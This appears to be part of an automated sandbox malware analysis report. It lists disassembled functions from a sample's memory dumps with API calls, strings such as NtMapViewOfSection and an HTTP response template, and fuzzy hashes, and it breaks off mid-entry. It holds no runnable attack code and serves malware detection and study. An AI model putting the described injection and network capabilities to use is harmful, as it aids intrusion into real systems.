Instruction ID: 5b52cce3f6504df2cecb03439065372725df43b4854eda57252c3430c4dfd094
Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
Instruction Fuzzy Hash: C541D32A720B1199FF05EBB9DD8479D23E4BB89784F401917CE495BB68EF38C20AC751

Function 03A9EA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AAE0FC: RevertToSelf.ADVAPI32 ref: 03AAE10A

InternetOpenA.WININET ref: 03A9EB0C
InternetSetOptionA.WININET ref: 03A9EB2C
InternetSetOptionA.WININET ref: 03A9EB44
InternetConnectA.WININET ref: 03A9EB7A
InternetSetOptionA.WININET ref: 03A9EBB7
InternetSetOptionA.WININET ref: 03A9EBE2

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction ID: 53809a92af12b3e2656169178588f420172ae15745ca3db7591f40f801a13f64
Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction Fuzzy Hash: 1F41B37A300B4183EF15DB55E494B6AB765F796B49F04401ECA8B1BB66DF3CC605C701

Function 03AA6F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AA6F5E

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

htonl.WS2_32 ref: 03AA6F91
recvfrom.WS2_32 ref: 03AA6FD5
WSAGetLastError.WS2_32 ref: 03AA6FE2

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID:
API String ID: 2310505145-0
Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction ID: 5b29ff1b07851c8f17178651766aae7adf2cf9a1ed51bcbc03f46603be2adfc5
Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction Fuzzy Hash: 7A419472300B80C6EB11CF69E84471BB769F789B95F184126DAC947B64DF3AC581DB41

Function 03AA79C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03AA79FF
UpdateProcThreadAttribute.KERNEL32 ref: 03AA7A3F
GetLastError.KERNEL32 ref: 03AA7A49
GetCurrentProcess.KERNEL32 ref: 03AA7A7E
GetCurrentProcess.KERNEL32 ref: 03AA7ABE
GetCurrentProcess.KERNEL32 ref: 03AA7AEF

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
String ID:
API String ID: 1014270282-0
Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction ID: 696930b8c5d4dc1d63b1419e946d21e6dc489edf864ad7fa021bad9c3ac06bdc
Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction Fuzzy Hash: 09319C32314B8086EB21CF66D80435AB7A5F789BE8F08462ADE8947B54DF3DC605CB00

Function 036AFA67 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 036AF9BE

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_invalid_parameter_noinfo.LIBCMT ref: 036AF9C9
_getstream.LIBCMT ref: 036AF9E9
_errno.LIBCMT ref: 036AF9FB
_errno.LIBCMT ref: 036AFA0D
_openfile.LIBCMT ref: 036AFA3B

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 14f9975bf4e765c4172f8029720c17abc7a3d9028f0f4e986d1a5709473ec300
Instruction ID: 8cf070c4d006dd5cd7556b6b3e21a34456aacadcaffe11a202402b0ac508b7f1
Opcode Fuzzy Hash: 14f9975bf4e765c4172f8029720c17abc7a3d9028f0f4e986d1a5709473ec300
Instruction Fuzzy Hash: 9221A73061CF4A9FD751FB2C5C043AAB6E2FB89310F05096E954ACB251EE74CC814B96

Function 03AB0620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB0577

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03AB0582
_getstream.LIBCMT ref: 03AB05A2
_errno.LIBCMT ref: 03AB05B4
_errno.LIBCMT ref: 03AB05C6
_openfile.LIBCMT ref: 03AB05F4

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction ID: bbb7b2ce35b2fbf81c7f133a73430bd7fbdc1012f6ecf3e813aaba30fb0cf2d0
Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction Fuzzy Hash: 3C11E6B570478285EB11DB22A90039FA7BCBB45BC0F4886279E899BF16EF7CC0118710

Function 03A9FC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A9FC85

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

free.LIBCMT ref: 03A9FCC0
fwrite.LIBCMT ref: 03A9FD01
fclose.LIBCMT ref: 03A9FD09
free.LIBCMT ref: 03A9FD16

Part of subcall function 03AAF244: HeapFree.KERNEL32 ref: 03AAF25A
Part of subcall function 03AAF244: _errno.LIBCMT ref: 03AAF264
Part of subcall function 03AAF244: GetLastError.KERNEL32 ref: 03AAF26C

GetLastError.KERNEL32 ref: 03A9FD1B

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction ID: 22423e6f50e5c8cf7f8310e0d269dc8848e70050a7ff25eb6db93471a62f36d0
Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction Fuzzy Hash: 7411C82A704B4045DE14E722A6542AEA391AB85FE4F484627DEAE5FB89DF2CC5058B80

Function 03AA4488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03AA44A6
WaitNamedPipeA.KERNEL32 ref: 03AA44BB
CreateFileA.KERNEL32 ref: 03AA44E5
SetNamedPipeHandleState.KERNEL32 ref: 03AA4507
DisconnectNamedPipe.KERNEL32 ref: 03AA4514
SetLastError.KERNEL32 ref: 03AA4529

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
String ID:
API String ID: 3798860377-0
Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction ID: 4214dcfa9b1948334385472f5a0b10c3180386bb9f63874f8354a743633c0b90
Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction Fuzzy Hash: 00112333314B5183FB10DB2AF51872E6365F789BE4F445616EA9A47B94CFBCC4458B02

Function 03AAEFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AAF00F

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

malloc.LIBCMT ref: 03AAF01D

Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF318
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF31D

malloc.LIBCMT ref: 03AAF03F
_snprintf.LIBCMT ref: 03AAF05A

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

malloc.LIBCMT ref: 03AAF075

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 03AAF044

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction ID: 473019f9c73700c8356ab52d97d7e3d8895e3c5937795e61bdf08ceebb5ca363
Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction Fuzzy Hash: D801D23A705B904ADA58DB66BD04629B799F78CFE0F04922ADFA94B7C4DF38C0418780

Function 036935B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03693604

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

malloc.LIBCMT ref: 0369360F

Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE75F
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE764

free.LIBCMT ref: 036936F6
free.LIBCMT ref: 036936FE
free.LIBCMT ref: 03693706
free.LIBCMT ref: 03693712
free.LIBCMT ref: 0369371F

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
Instruction ID: 57a57dd7865f4de23db0cbfca57b81df0cdaa3968d97ea9bc4a7f718cc6fcfaf
Opcode Fuzzy Hash: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
Instruction Fuzzy Hash: E241C438718F0A4FEB69EB2C995557A73D8FB89204750056ED84BC7316EF20EC228AC5

Function 03AA31F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 03AA322E
strchr.LIBCMT ref: 03AA324C
malloc.LIBCMT ref: 03AA3264
malloc.LIBCMT ref: 03AA3271
rand.LIBCMT ref: 03AA333D
free.LIBCMT ref: 03AA345B
free.LIBCMT ref: 03AA3463

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$rand
String ID:
API String ID: 1305919620-0
Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction ID: c424ad1a626831051dffe5f7424077e30831ad31e296c51cea79377f852b3f31
Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction Fuzzy Hash: 8E61F86B608FC446EE2ADF2DA5103EAA7A0EF95B84F0C5216CF891B755EF2DC1478710

Function 03A94170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A941BD

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

malloc.LIBCMT ref: 03A941C8

Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF318
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF31D

free.LIBCMT ref: 03A942AF
free.LIBCMT ref: 03A942B7
free.LIBCMT ref: 03A942BF
free.LIBCMT ref: 03A942CB
free.LIBCMT ref: 03A942D8

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction ID: 2477234ee69cfadd28e9f5ad25e596d0be7e7529e1e764a27efe249dc5eb2342
Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction Fuzzy Hash: B141AE2A300B919BEE1DDBABAA5026A6798B749BC0F84412BCF465F714DF78D427C700

Function 03A9F274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A9F2ED
htonl.WS2_32 ref: 03A9F2F7
malloc.LIBCMT ref: 03A9F310
free.LIBCMT ref: 03A9F37D

Strings

zyxwvutsrqponmlk, xrefs: 03A9F34C

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction ID: b5255ffeec2195188b22ff8189b1e290f17df05f8296604bbb356205d66e64d5
Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction Fuzzy Hash: B521FB2B305B404ADF18EB76AA5072DA7D59789BD0F44453B9E598B75AEF3CC5068300

Function 03AA3FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA3FE7
GetProcAddress.KERNEL32 ref: 03AA3FF7
GetLastError.KERNEL32 ref: 03AA40BF

Part of subcall function 03AACC00: GetCurrentProcess.KERNEL32 ref: 03AACC8D

Part of subcall function 03AAD134: GetCurrentProcess.KERNEL32 ref: 03AAD161

Strings

NtMapViewOfSection, xrefs: 03AA3FED
ntdll.dll, xrefs: 03AA3FD9

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressErrorHandleLastModuleProc
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 1006775078-3170647572
Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction ID: 28660170332ecaed268bb76c6dfef5168983874b5e312fd54ace382e92ffefdf
Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction Fuzzy Hash: 2831BE37710B4486EF10DB66E45876AB7A0F789BB4F44072AEEA90BB94DF7CC5458700

Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040268A

Strings

CCG , xrefs: 004025F6

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E

Function 03AA1FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AA1FD2

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

_snprintf.LIBCMT ref: 03AA1FF1

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

remove.LIBCMT ref: 03AA1FFD
remove.LIBCMT ref: 03AA2004

Strings

%s\%s, xrefs: 03AA1FD7

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction ID: a8afaa30b43c656e665e408d7ee80f48d9251e866aa0c86ad291842afda78f34
Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction Fuzzy Hash: 9FF0B42A208B80CAD318DB15B9103AAA374E784FC0F584532AF891BB15CF38C4118744

Function 0369BEBB Relevance: 7.9, APIs: 6, Instructions: 411COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 036A5433: malloc.LIBCMT ref: 036A544F

malloc.LIBCMT ref: 0369BF82

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

Part of subcall function 036AB677: malloc.LIBCMT ref: 036AB6E3

Part of subcall function 036ADEEF: malloc.LIBCMT ref: 036ADF3F

Part of subcall function 036ADEEF: realloc.LIBCMT ref: 036ADF4E

malloc.LIBCMT ref: 0369C091
_snprintf.LIBCMT ref: 0369C108
_snprintf.LIBCMT ref: 0369C12E
_snprintf.LIBCMT ref: 0369C155
free.LIBCMT ref: 0369C30D

Memory Dump Source

